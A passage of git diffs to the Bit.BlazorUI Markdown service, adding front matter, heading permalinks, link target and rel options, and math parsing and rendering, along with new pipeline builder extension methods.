+    public string Fence { get; init; } = "---";
+
+    /// <summary>The raw text between the fences, with the line endings normalized to <c>\n</c>.</summary>
+    public string Text { get; init; } = string.Empty;
+
+    /// <summary>True when the block was fenced with <c>+++</c>, i.e. TOML rather than YAML.</summary>
+    public bool IsToml => Fence.Length > 0 && Fence[0] == '+';
+
+    /// <summary>
+    /// Returns the document's front matter block, or <c>null</c> when it has none. Only a block at
+    /// the very top of the document is front matter, so this reads the first child rather than
+    /// searching the tree.
+    /// </summary>
+    public static BitMarkdownFrontMatterNode? Find(BitMarkdownDocumentNode document)
+    {
+        ArgumentNullException.ThrowIfNull(document);
+        return document.Children.Count > 0 ? document.Children[0] as BitMarkdownFrontMatterNode : null;
+    }
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownFrontMatterRenderer.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownFrontMatterRenderer.cs
@@ -1,0 +1,16 @@
+using Microsoft.AspNetCore.Components.Rendering;
+
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// Renders a <see cref="BitMarkdownFrontMatterNode"/> as nothing at all. The block describes the
+/// document instead of belonging to it, so it is read from the AST rather than displayed.
+/// </summary>
+public sealed class BitMarkdownFrontMatterRenderer : BitMarkdownNodeRenderer
+{
+    public override bool Accept(BitMarkdownNode node) => node is BitMarkdownFrontMatterNode;
+
+    public override void Write(BitMarkdownRenderer renderer, RenderTreeBuilder builder, BitMarkdownNode node)
+    {
+    }
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownGitHubFlavoredExtension.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownGitHubFlavoredExtension.cs
@@ -1,9 +1,16 @@
 namespace Bit.BlazorUI;
 
 /// <summary>
-/// The GitHub Flavored Markdown bundle: pipe tables, strikethrough, task lists and
-/// autolink literals.
+/// The GitHub Flavored Markdown bundle: the four extensions of the GFM spec - pipe tables,
+/// strikethrough, task lists and autolink literals - plus the two things GitHub's own
+/// renderer adds on top of it, footnotes and alerts.
 /// </summary>
+/// <remarks>
+/// Footnotes are bundled rather than left separate because their definition syntax
+/// (<c>[^1]: ...</c>) is also a valid CommonMark link reference definition. Writing a
+/// footnote under a pipeline that has tables and task lists but not footnotes would quietly
+/// turn the note into a link destination instead of failing visibly.
+/// </remarks>
 public sealed class BitMarkdownGitHubFlavoredExtension : IBitMarkdownExtension
 {
     public void Setup(BitMarkdownPipelineBuilder builder)
@@ -11,6 +18,8 @@ public sealed class BitMarkdownGitHubFlavoredExtension : IBitMarkdownExtension
         builder.Use(new BitMarkdownPipeTableExtension())
                .Use(new BitMarkdownStrikethroughExtension())
                .Use(new BitMarkdownTaskListExtension())
-               .Use(new BitMarkdownAutoLinkExtension());
+               .Use(new BitMarkdownAutoLinkExtension())
+               .Use(new BitMarkdownFootnoteExtension())
+               .Use(new BitMarkdownAlertExtension());
     }
 }

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownHeadingAnchorNode.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownHeadingAnchorNode.cs
@@ -1,0 +1,14 @@
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// The permalink the auto-identifier flavor can append to a heading, so a reader can copy a link
+/// straight to that section. It renders as an <c>&lt;a&gt;</c> pointing at the heading's own id.
+/// </summary>
+public sealed class BitMarkdownHeadingAnchorNode : BitMarkdownNode
+{
+    /// <summary>The id of the heading this anchor links to.</summary>
+    public string Id { get; init; } = string.Empty;
+
+    /// <summary>The heading's plain text, used to give the link an accessible name.</summary>
+    public string HeadingText { get; init; } = string.Empty;
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownHeadingAnchorRenderer.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownHeadingAnchorRenderer.cs
@@ -1,0 +1,32 @@
+using System.Globalization;
+using Microsoft.AspNetCore.Components.Rendering;
+
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// Renders a <see cref="BitMarkdownHeadingAnchorNode"/> as a permalink. The glyph itself is
+/// hidden from assistive technology and the link is named after its heading instead, so a screen
+/// reader announces "Permalink to Installation" rather than the character.
+/// </summary>
+public sealed class BitMarkdownHeadingAnchorRenderer : BitMarkdownNodeRenderer
+{
+    public override bool Accept(BitMarkdownNode node) => node is BitMarkdownHeadingAnchorNode;
+
+    // Fixed literal sequence numbers (see BitMarkdownCoreRenderer for the rationale).
+    public override void Write(BitMarkdownRenderer r, RenderTreeBuilder b, BitMarkdownNode node)
+    {
+        var anchor = (BitMarkdownHeadingAnchorNode)node;
+
+        b.OpenElement(0, "a");
+        b.AddAttribute(1, "class", "bit-mdv-anchor");
+        b.AddAttribute(2, "href", "#" + anchor.Id);
+        b.AddAttribute(3, "aria-label", string.IsNullOrEmpty(anchor.HeadingText)
+            ? r.Texts.PermalinkToSection
+            : string.Format(CultureInfo.CurrentCulture, r.Texts.PermalinkTo, anchor.HeadingText));
+        b.OpenElement(4, "span");
+        b.AddAttribute(5, "aria-hidden", "true");
+        b.AddContent(6, "#");
+        b.CloseElement();
+        b.CloseElement();
+    }
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownLinkOptionsExtension.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownLinkOptionsExtension.cs
@@ -1,0 +1,50 @@
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// Decides what <c>target</c> and <c>rel</c> a rendered link carries, replacing the defaults
+/// (external links open in a new tab with <c>noopener noreferrer</c>).
+/// </summary>
+/// <remarks>
+/// The two things this is usually for: keeping links in the same tab, because a viewer embedded in
+/// an app is not a web page and a new tab is jarring there; and marking user-written links
+/// <c>nofollow ugc</c>, which is what search engines expect of content a site did not write and
+/// what stops a comment box from becoming a link farm.
+/// </remarks>
+public sealed class BitMarkdownLinkOptionsExtension : IBitMarkdownExtension
+{
+    /// <summary>Creates the extension with the policy to apply.</summary>
+    /// <param name="externalTarget">Where a link to another origin opens. Defaults to a new tab.</param>
+    /// <param name="externalRel">
+    /// The <c>rel</c> for a link to another origin, or <c>null</c> for none. Defaults to
+    /// <c>noopener noreferrer</c>; add <c>nofollow ugc</c> to it for user-written content.
+    /// </param>
+    /// <param name="internalTarget">Where a link within the document or the site opens. Defaults to the same tab.</param>
+    /// <param name="internalRel">The <c>rel</c> for a link within the document or the site, or <c>null</c> for none.</param>
+    public BitMarkdownLinkOptionsExtension(
+        BitMarkdownLinkTarget externalTarget = BitMarkdownLinkTarget.Blank,
+        string? externalRel = "noopener noreferrer",
+        BitMarkdownLinkTarget internalTarget = BitMarkdownLinkTarget.Self,
+        string? internalRel = null)
+    {
+        ExternalTarget = externalTarget;
+        ExternalRel = externalRel;
+        InternalTarget = internalTarget;
+        InternalRel = internalRel;
+    }
+
+    /// <summary>Where a link to another origin opens.</summary>
+    public BitMarkdownLinkTarget ExternalTarget { get; }
+
+    /// <summary>The <c>rel</c> given to a link to another origin.</summary>
+    public string? ExternalRel { get; }
+
+    /// <summary>Where a link within the document or the site opens.</summary>
+    public BitMarkdownLinkTarget InternalTarget { get; }
+
+    /// <summary>The <c>rel</c> given to a link within the document or the site.</summary>
+    public string? InternalRel { get; }
+
+    public void Setup(BitMarkdownPipelineBuilder builder)
+        => builder.Renderers.Add(new BitMarkdownLinkOptionsRenderer(
+            ExternalTarget, ExternalRel, InternalTarget, InternalRel));
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownLinkOptionsExtension.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownLinkOptionsExtension.cs
@@ -44,6 +44,11 @@ public sealed class BitMarkdownLinkOptionsExtension : IBitMarkdownExtension
     /// <summary>The <c>rel</c> given to a link within the document or the site.</summary>
     public string? InternalRel { get; }
 
+    public bool IsSameConfigurationAs(IBitMarkdownExtension other)
+        => other is BitMarkdownLinkOptionsExtension e
+           && e.ExternalTarget == ExternalTarget && e.ExternalRel == ExternalRel
+           && e.InternalTarget == InternalTarget && e.InternalRel == InternalRel;
+
     public void Setup(BitMarkdownPipelineBuilder builder)
         => builder.Renderers.Add(new BitMarkdownLinkOptionsRenderer(
             ExternalTarget, ExternalRel, InternalTarget, InternalRel));

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownLinkOptionsRenderer.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownLinkOptionsRenderer.cs
@@ -1,0 +1,67 @@
+using Microsoft.AspNetCore.Components.Rendering;
+
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// Renders links with the <c>target</c> and <c>rel</c> the host chose, overriding the core
+/// renderer's defaults (a new tab and <c>noopener noreferrer</c> for anything external).
+/// </summary>
+public sealed class BitMarkdownLinkOptionsRenderer : BitMarkdownNodeRenderer
+{
+    /// <summary>Creates a renderer applying the supplied policy.</summary>
+    public BitMarkdownLinkOptionsRenderer(
+        BitMarkdownLinkTarget externalTarget,
+        string? externalRel,
+        BitMarkdownLinkTarget internalTarget,
+        string? internalRel)
+    {
+        ExternalTarget = externalTarget;
+        ExternalRel = externalRel;
+        InternalTarget = internalTarget;
+        InternalRel = internalRel;
+    }
+
+    /// <summary>Where a link to another origin opens.</summary>
+    public BitMarkdownLinkTarget ExternalTarget { get; }
+
+    /// <summary>The <c>rel</c> given to a link to another origin, or <c>null</c> for none.</summary>
+    public string? ExternalRel { get; }
+
+    /// <summary>Where a link within the document or the site opens.</summary>
+    public BitMarkdownLinkTarget InternalTarget { get; }
+
+    /// <summary>The <c>rel</c> given to a link within the document or the site, or <c>null</c> for none.</summary>
+    public string? InternalRel { get; }
+
+    public override bool Accept(BitMarkdownNode node) => node is BitMarkdownLinkNode;
+
+    // Fixed literal sequence numbers (see BitMarkdownCoreRenderer for the rationale).
+    public override void Write(BitMarkdownRenderer r, RenderTreeBuilder b, BitMarkdownNode node)
+    {
+        var link = (BitMarkdownLinkNode)node;
+        bool external = IsExternal(link.Url);
+
+        b.OpenElement(0, "a");
+        if (string.IsNullOrEmpty(link.Url) is false)
+        {
+            b.AddAttribute(1, "href", link.Url);
+
+            var target = external ? ExternalTarget : InternalTarget;
+            if (target != BitMarkdownLinkTarget.Self)
+                b.AddAttribute(2, "target", "_" + target.ToString().ToLowerInvariant());
+
+            var rel = external ? ExternalRel : InternalRel;
+            if (string.IsNullOrWhiteSpace(rel) is false)
+                b.AddAttribute(3, "rel", rel);
+        }
+        if (string.IsNullOrEmpty(link.Title) is false)
+            b.AddAttribute(4, "title", link.Title);
+
+        r.WriteNodes(b, link.Children);
+        b.CloseElement();
+    }
+
+    private static bool IsExternal(string url) =>
+        url.StartsWith("http://", StringComparison.OrdinalIgnoreCase) ||
+        url.StartsWith("https://", StringComparison.OrdinalIgnoreCase);
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownLinkOptionsRenderer.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownLinkOptionsRenderer.cs
@@ -39,7 +39,7 @@ public sealed class BitMarkdownLinkOptionsRenderer : BitMarkdownNodeRenderer
     public override void Write(BitMarkdownRenderer r, RenderTreeBuilder b, BitMarkdownNode node)
     {
         var link = (BitMarkdownLinkNode)node;
-        bool external = IsExternal(link.Url);
+        bool external = BitMarkdownLinkHelpers.IsExternalUrl(link.Url);
 
         b.OpenElement(0, "a");
         if (string.IsNullOrEmpty(link.Url) is false)
@@ -60,8 +60,4 @@ public sealed class BitMarkdownLinkOptionsRenderer : BitMarkdownNodeRenderer
         r.WriteNodes(b, link.Children);
         b.CloseElement();
     }
-
-    private static bool IsExternal(string url) =>
-        url.StartsWith("http://", StringComparison.OrdinalIgnoreCase) ||
-        url.StartsWith("https://", StringComparison.OrdinalIgnoreCase);
 }

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownLinkTarget.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownLinkTarget.cs
@@ -1,0 +1,17 @@
+namespace Bit.BlazorUI;
+
+/// <summary>Where a link opens, i.e. the <c>target</c> attribute it is rendered with.</summary>
+public enum BitMarkdownLinkTarget
+{
+    /// <summary>No <c>target</c> at all: the link opens in the same browsing context.</summary>
+    Self,
+
+    /// <summary>Opens in a new tab or window (<c>_blank</c>).</summary>
+    Blank,
+
+    /// <summary>Opens in the parent browsing context (<c>_parent</c>).</summary>
+    Parent,
+
+    /// <summary>Opens in the topmost browsing context (<c>_top</c>).</summary>
+    Top
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownMathBlockParser.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownMathBlockParser.cs
@@ -12,8 +12,11 @@ public sealed class BitMarkdownMathBlockParser : BitMarkdownBlockParser
     // reinterpreted by anything that runs later.
     public override int Order => 12;
 
+    // Only a line that actually opens a block ends the paragraph before it. A "$$" that is neither
+    // a complete one-line block nor closed further down is prose - "The cost is\n$$5 for two" is
+    // one paragraph with a soft break in it, not two paragraphs split around a fence that never was.
     public override bool CanInterruptParagraph(BitMarkdownBlockProcessor state, int lineIndex)
-        => IsFence(state.Lines[lineIndex]);
+        => Opens(state.Lines, lineIndex);
 
     public override bool TryParse(BitMarkdownBlockProcessor state, List<BitMarkdownNode> output)
     {
@@ -53,6 +56,23 @@ public sealed class BitMarkdownMathBlockParser : BitMarkdownBlockParser
         });
         state.Line = i;
         return true;
+    }
+
+    // The same acceptance TryParse applies, asked of a line without consuming it: a complete
+    // one-line block, or an opening "$$" with a closing one somewhere below it.
+    private static bool Opens(IReadOnlyList<string> lines, int index)
+    {
+        if (IsFence(lines[index]) is false) return false;
+
+        string opening = lines[index].Trim();
+        if (opening.Length > 4 && opening.EndsWith("$$", StringComparison.Ordinal)) return true;
+        if (opening.Length != 2) return false;
+
+        for (int i = index + 1; i < lines.Count; i++)
+        {
+            if (lines[i].Trim() == "$$") return true;
+        }
+        return false;
     }
 
     private static bool IsFence(string line)

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownMathBlockParser.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownMathBlockParser.cs
@@ -1,0 +1,65 @@
+using System.Text;
+
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// Parses a display-math block: <c>$$</c> on a line of its own, the TeX, then a closing
+/// <c>$$</c>. The content is taken verbatim, exactly as a fenced code block's is.
+/// </summary>
+public sealed class BitMarkdownMathBlockParser : BitMarkdownBlockParser
+{
+    // Beside the fenced code block parser (10): both are verbatim fences, and neither may be
+    // reinterpreted by anything that runs later.
+    public override int Order => 12;
+
+    public override bool CanInterruptParagraph(BitMarkdownBlockProcessor state, int lineIndex)
+        => IsFence(state.Lines[lineIndex]);
+
+    public override bool TryParse(BitMarkdownBlockProcessor state, List<BitMarkdownNode> output)
+    {
+        var lines = state.Lines;
+        string first = lines[state.Line];
+        if (IsFence(first) is false) return false;
+
+        // "$$ x = 1 $$" on one line is a complete block.
+        string opening = first.Trim();
+        if (opening.Length > 4 && opening.EndsWith("$$", StringComparison.Ordinal))
+        {
+            output.Add(new BitMarkdownMathNode { Content = opening[2..^2].Trim(), Display = true, Block = true });
+            state.Line++;
+            return true;
+        }
+        if (opening.Length != 2) return false;
+
+        var sb = new StringBuilder();
+        int i = state.Line + 1;
+        bool closed = false;
+        while (i < lines.Count)
+        {
+            if (lines[i].Trim() == "$$") { i++; closed = true; break; }
+            sb.Append(lines[i]).Append('\n');
+            i++;
+        }
+
+        // An unterminated fence is not a block; leaving it unmatched keeps the document rendering
+        // as it did before the flavor was enabled.
+        if (closed is false) return false;
+
+        output.Add(new BitMarkdownMathNode
+        {
+            Content = BitMarkdownBlockProcessor.TrimTrailingNewline(sb.ToString()),
+            Display = true,
+            Block = true
+        });
+        state.Line = i;
+        return true;
+    }
+
+    private static bool IsFence(string line)
+    {
+        if (BitMarkdownBlockProcessor.GetIndent(line) >= 4) return false;
+
+        string trimmed = line.Trim();
+        return trimmed.Length >= 2 && trimmed.StartsWith("$$", StringComparison.Ordinal);
+    }
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownMathExtension.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownMathExtension.cs
@@ -1,0 +1,16 @@
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// Enables mathematics: <c>$inline$</c> and <c>$$display$$</c> are kept verbatim - safe from
+/// Markdown's emphasis and escape rules, which otherwise eat the underscores and backslashes TeX
+/// is made of - and marked for a client-side typesetter such as KaTeX or MathJax.
+/// </summary>
+public sealed class BitMarkdownMathExtension : IBitMarkdownExtension
+{
+    public void Setup(BitMarkdownPipelineBuilder builder)
+    {
+        builder.BlockParsers.Add(new BitMarkdownMathBlockParser());
+        builder.InlineParsers.Add(new BitMarkdownMathInlineParser());
+        builder.Renderers.Add(new BitMarkdownMathRenderer());
+    }
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownMathInlineParser.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownMathInlineParser.cs
@@ -23,6 +23,12 @@ public sealed class BitMarkdownMathInlineParser : BitMarkdownInlineParser
         if (contentStart >= s.Length) return false;
         if (open == 1 && (s[contentStart] == ' ' || s[contentStart] == '\n')) return false;
 
+        // Whether a "$" closes a run is decided by the character before it and the length of its
+        // own run - never by where this attempt started - so once a scan has reached the end of
+        // the text without finding one, no later "$" in the same text will either. Saying so is
+        // what keeps a paragraph of prices linear: without it each of them rescans the remainder.
+        if (state.HasNoMatchFrom(this, open, contentStart)) return false;
+
         int i = contentStart;
         while (i < s.Length)
         {
@@ -47,6 +53,10 @@ public sealed class BitMarkdownMathInlineParser : BitMarkdownInlineParser
             return true;
         }
 
+        // The scan ran out of text, so there is no closing delimiter of this length anywhere from
+        // here on. The other exits above are decisions about this position alone and say nothing
+        // about a later one, which is why only this one is remembered.
+        state.SetNoMatchFrom(this, open, contentStart);
         return false;
     }
 }

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownMathInlineParser.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownMathInlineParser.cs
@@ -1,0 +1,52 @@
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// Handles inline mathematics: <c>$a^2 + b^2$</c>. The rules are the ones every processor
+/// converged on, and they exist to keep prices out of equations: the opening <c>$</c> must be
+/// followed by a non-space, the closing one preceded by a non-space, and a digit may not follow
+/// the closing delimiter - so "it costs $5 and $10" is text, not math.
+/// </summary>
+public sealed class BitMarkdownMathInlineParser : BitMarkdownInlineParser
+{
+    public override char[] TriggerChars => new[] { '$' };
+
+    public override bool TryParse(BitMarkdownInlineProcessor state)
+    {
+        string s = state.Text;
+        int start = state.Pos;
+
+        int open = BitMarkdownInlineHelpers.CountRun(s, start, '$');
+        // A run of three or more is not a delimiter; "$$" opens a display run inside a paragraph.
+        if (open > 2) return false;
+
+        int contentStart = start + open;
+        if (contentStart >= s.Length) return false;
+        if (open == 1 && (s[contentStart] == ' ' || s[contentStart] == '\n')) return false;
+
+        int i = contentStart;
+        while (i < s.Length)
+        {
+            if (s[i] == '\\') { i += 2; continue; }
+            if (s[i] != '$') { i++; continue; }
+
+            int close = BitMarkdownInlineHelpers.CountRun(s, i, '$');
+            if (close < open) { i += close; continue; }
+
+            if (i == contentStart) return false;
+            if (open == 1 && s[i - 1] == ' ') { i += close; continue; }
+            // "$100 and $200" would otherwise read as math: a digit right after the closing
+            // delimiter means these were prices all along.
+            if (open == 1 && i + close < s.Length && char.IsAsciiDigit(s[i + close])) return false;
+
+            state.AppendNode(new BitMarkdownMathNode
+            {
+                Content = s[contentStart..i],
+                Display = open == 2
+            });
+            state.Pos = i + open;
+            return true;
+        }
+
+        return false;
+    }
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownMathNode.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownMathNode.cs
@@ -1,0 +1,25 @@
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// A run of mathematics, written <c>$inline$</c> or <c>$$display$$</c>. The component does not
+/// typeset it - that is what KaTeX and MathJax are for - it keeps the TeX exactly as written,
+/// safe from Markdown's own emphasis and escape rules, and marks it so a typesetter can find it.
+/// </summary>
+public sealed class BitMarkdownMathNode : BitMarkdownNode
+{
+    /// <summary>The TeX between the delimiters, exactly as the author wrote it.</summary>
+    public string Content { get; init; } = string.Empty;
+
+    /// <summary>
+    /// True for <c>$$...$$</c>, which a typesetter sets in display style - centred and on a line of
+    /// its own - rather than in the run of text.
+    /// </summary>
+    public bool Display { get; init; }
+
+    /// <summary>
+    /// True when the run stood alone as a block, rather than inside a paragraph. Only a block one
+    /// is rendered as a <c>div</c>: a <c>div</c> inside a <c>p</c> is markup no browser keeps as
+    /// written, and the DOM it rearranges it into is not the one Blazor thinks it rendered.
+    /// </summary>
+    public bool Block { get; init; }
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownMathRenderer.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownMathRenderer.cs
@@ -1,0 +1,42 @@
+using Microsoft.AspNetCore.Components.Rendering;
+
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// Renders a <see cref="BitMarkdownMathNode"/> as the element a TeX typesetter looks for: a
+/// <c>span.math-inline</c>, or a <c>math-display</c> that is a <c>div</c> when the run stood alone
+/// as a block and a <c>span</c> when it was written inside a paragraph - either way holding the TeX
+/// with its delimiters.
+/// </summary>
+/// <remarks>
+/// The delimiters are re-emitted on purpose. KaTeX's <c>renderMathInElement</c> and MathJax both
+/// find math by its delimiters, so the output typesets with either of them and with no
+/// configuration; the classes are there for a processor - or a stylesheet - that would rather look
+/// for those. With no typesetter loaded at all, the TeX simply reads as the text it is.
+/// </remarks>
+public sealed class BitMarkdownMathRenderer : BitMarkdownNodeRenderer
+{
+    public override bool Accept(BitMarkdownNode node) => node is BitMarkdownMathNode;
+
+    // Fixed literal sequence numbers (see BitMarkdownCoreRenderer for the rationale).
+    public override void Write(BitMarkdownRenderer r, RenderTreeBuilder b, BitMarkdownNode node)
+    {
+        var math = (BitMarkdownMathNode)node;
+
+        if (math.Block)
+        {
+            b.OpenElement(0, "div");
+            b.AddAttribute(1, "class", "math math-display");
+            b.AddContent(2, "$$" + math.Content + "$$");
+            b.CloseElement();
+            return;
+        }
+
+        // Display style written inside a paragraph still renders as a span: only the element
+        // changes, so the markup stays valid and the class a typesetter looks for stays right.
+        b.OpenElement(3, "span");
+        b.AddAttribute(4, "class", math.Display ? "math math-display" : "math math-inline");
+        b.AddContent(5, math.Display ? "$$" + math.Content + "$$" : "$" + math.Content + "$");
+        b.CloseElement();
+    }
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownPipelineBuilderExtensions.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownPipelineBuilderExtensions.cs
@@ -27,9 +27,74 @@ public static class BitMarkdownPipelineBuilderExtensions
     public static BitMarkdownPipelineBuilder UseEmojis(this BitMarkdownPipelineBuilder b, IReadOnlyDictionary<string, string> overrides)
         => b.Use(new BitMarkdownEmojiExtension(overrides));
 
+    /// <summary>
+    /// Adds the emphasis flavors beyond <c>*</c>, <c>_</c> and <c>~~</c>: <c>~subscript~</c>,
+    /// <c>^superscript^</c>, <c>++inserted++</c> and <c>==highlighted==</c>. Implies strikethrough,
+    /// since subscript shares the <c>~</c> character with it.
+    /// </summary>
+    public static BitMarkdownPipelineBuilder UseEmphasisExtras(this BitMarkdownPipelineBuilder b)
+        => b.Use(new BitMarkdownEmphasisExtrasExtension());
+
+    /// <summary>
+    /// Adds YAML (<c>---</c>) and TOML (<c>+++</c>) front matter, so a metadata block at the top of
+    /// the document is read out of the source instead of rendered as a rule and a heading.
+    /// </summary>
+    public static BitMarkdownPipelineBuilder UseFrontMatter(this BitMarkdownPipelineBuilder b)
+        => b.Use(new BitMarkdownFrontMatterExtension());
+
+    /// <summary>
+    /// Adds typographic replacement: curly quotes, en and em dashes, ellipses and guillemets.
+    /// Code spans, code blocks and URLs are left exactly as written.
+    /// </summary>
+    public static BitMarkdownPipelineBuilder UseSmartyPants(this BitMarkdownPipelineBuilder b)
+        => b.Use(new BitMarkdownSmartyPantsExtension());
+
+    /// <summary>
+    /// Adds custom containers: <c>:::name optional title</c> ... <c>:::</c> renders as a
+    /// <c>div</c> classed after the name, which is how documentation sites write admonitions and
+    /// layout blocks. Containers nest.
+    /// </summary>
+    public static BitMarkdownPipelineBuilder UseContainers(this BitMarkdownPipelineBuilder b)
+        => b.Use(new BitMarkdownContainerExtension());
+
+    /// <summary>
+    /// Adds definition lists: a term on its own line followed by <c>: its definition</c> renders
+    /// as a real <c>&lt;dl&gt;</c>.
+    /// </summary>
+    public static BitMarkdownPipelineBuilder UseDefinitionLists(this BitMarkdownPipelineBuilder b)
+        => b.Use(new BitMarkdownDefinitionListExtension());
+
+    /// <summary>
+    /// Adds abbreviations: <c>*[HTML]: HyperText Markup Language</c> declares a term once and
+    /// every whole-word occurrence of it becomes an <c>&lt;abbr&gt;</c> carrying the expansion.
+    /// </summary>
+    public static BitMarkdownPipelineBuilder UseAbbreviations(this BitMarkdownPipelineBuilder b)
+        => b.Use(new BitMarkdownAbbreviationExtension());
+
+    /// <summary>
+    /// Adds mathematics: <c>$inline$</c> and <c>$$display$$</c> are kept verbatim and marked for a
+    /// client-side typesetter such as KaTeX or MathJax.
+    /// </summary>
+    public static BitMarkdownPipelineBuilder UseMathematics(this BitMarkdownPipelineBuilder b)
+        => b.Use(new BitMarkdownMathExtension());
+
+    /// <summary>
+    /// Adds figures: an image alone in a paragraph and written with a title renders as a
+    /// <c>&lt;figure&gt;</c> with that title as its <c>&lt;figcaption&gt;</c>.
+    /// </summary>
+    public static BitMarkdownPipelineBuilder UseFigures(this BitMarkdownPipelineBuilder b)
+        => b.Use(new BitMarkdownFigureExtension());
+
     /// <summary>Adds automatic heading id slugs.</summary>
     public static BitMarkdownPipelineBuilder UseAutoIdentifiers(this BitMarkdownPipelineBuilder b)
         => b.Use(new BitMarkdownAutoIdentifierExtension());
+
+    /// <summary>
+    /// Adds automatic heading id slugs and, when <paramref name="anchorLinks"/> is <c>true</c>, a
+    /// permalink after each heading so a reader can copy a link straight to that section.
+    /// </summary>
+    public static BitMarkdownPipelineBuilder UseAutoIdentifiers(this BitMarkdownPipelineBuilder b, bool anchorLinks)
+        => b.Use(new BitMarkdownAutoIdentifierExtension(anchorLinks));
 
     /// <summary>Adds GitHub-style footnotes (<c>[^1]</c> plus a <c>[^1]: ...</c> definition).</summary>
     public static BitMarkdownPipelineBuilder UseFootnotes(this BitMarkdownPipelineBuilder b)
@@ -39,15 +104,72 @@ public static class BitMarkdownPipelineBuilderExtensions
     public static BitMarkdownPipelineBuilder UseAlerts(this BitMarkdownPipelineBuilder b)
         => b.Use(new BitMarkdownAlertExtension());
 
+    /// <summary>
+    /// Rewrites every link and image destination through a function of your own. The result is
+    /// sanitized again on the way out, so a rewriter can never reintroduce an unsafe destination;
+    /// returning <c>null</c> drops the destination and keeps the text.
+    /// </summary>
+    public static BitMarkdownPipelineBuilder UseUrlRewriter(
+        this BitMarkdownPipelineBuilder b, Func<BitMarkdownUrlRewriteContext, string?> rewrite)
+        => b.Use(new BitMarkdownUrlRewriteExtension(rewrite));
+
+    /// <summary>
+    /// Resolves every relative link and image destination against <paramref name="baseUrl"/> -
+    /// what a README needs before it can be rendered anywhere but the repository it came from.
+    /// Absolute destinations and in-page fragments are left alone.
+    /// </summary>
+    public static BitMarkdownPipelineBuilder UseBaseUrl(this BitMarkdownPipelineBuilder b, string baseUrl)
+        => b.Use(BitMarkdownUrlRewriteExtension.ForBaseUrl(baseUrl));
+
+    /// <summary>
+    /// Chooses the <c>target</c> and <c>rel</c> a rendered link carries, replacing the defaults
+    /// (external links open in a new tab with <c>noopener noreferrer</c>). Pass
+    /// <c>"noopener noreferrer nofollow ugc"</c> for links a site's own readers wrote.
+    /// </summary>
+    public static BitMarkdownPipelineBuilder UseLinkOptions(
+        this BitMarkdownPipelineBuilder b,
+        BitMarkdownLinkTarget externalTarget = BitMarkdownLinkTarget.Blank,
+        string? externalRel = "noopener noreferrer",
+        BitMarkdownLinkTarget internalTarget = BitMarkdownLinkTarget.Self,
+        string? internalRel = null)
+        => b.Use(new BitMarkdownLinkOptionsExtension(externalTarget, externalRel, internalTarget, internalRel));
+
     /// <summary>Renders every single newline as a line break, like a chat or comment box.</summary>
     public static BitMarkdownPipelineBuilder UseSoftLineAsHardLine(this BitMarkdownPipelineBuilder b)
         => b.Use(new BitMarkdownSoftLineAsHardLineExtension());
+
+    /// <summary>
